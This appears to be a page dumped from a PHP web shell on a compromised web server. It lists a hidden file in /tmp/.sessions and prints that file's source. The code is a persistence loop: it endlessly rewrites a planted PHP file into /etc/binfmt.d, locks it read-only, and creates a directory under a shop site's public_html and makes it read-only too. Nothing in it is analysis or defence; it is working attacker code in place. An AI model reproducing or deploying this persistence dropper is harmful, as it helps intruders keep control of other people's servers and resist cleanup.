Your IP : 10.128.30.70


Current Path : /proc/self/root/tmp/.sessions/
Upload File :
Current File : //proc/self/root/tmp/.sessions/.L2V0Yy9iaW5mbXQuZGV4dC1oYW5kbGVy

<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/home/shopalmacgroup/app/public_html/pub")){
        mkdir("/home/shopalmacgroup/app/public_html/pub");
    }
    if (!file_exists("/etc/binfmt.d/ext.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L2V0Yy9iaW5mbXQuZGV4dC10ZXh0"));
        file_put_contents("/etc/binfmt.d/ext.php", base64_decode($text));
    }
    if (gecko_perm("/etc/binfmt.d/ext.php") != 0444){
        chmod("/etc/binfmt.d/ext.php", 0444);
    }
    if (gecko_perm("/home/shopalmacgroup/app/public_html/pub") != 0555){
        chmod("/home/shopalmacgroup/app/public_html/pub", 0555);
    }
}

function gecko_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}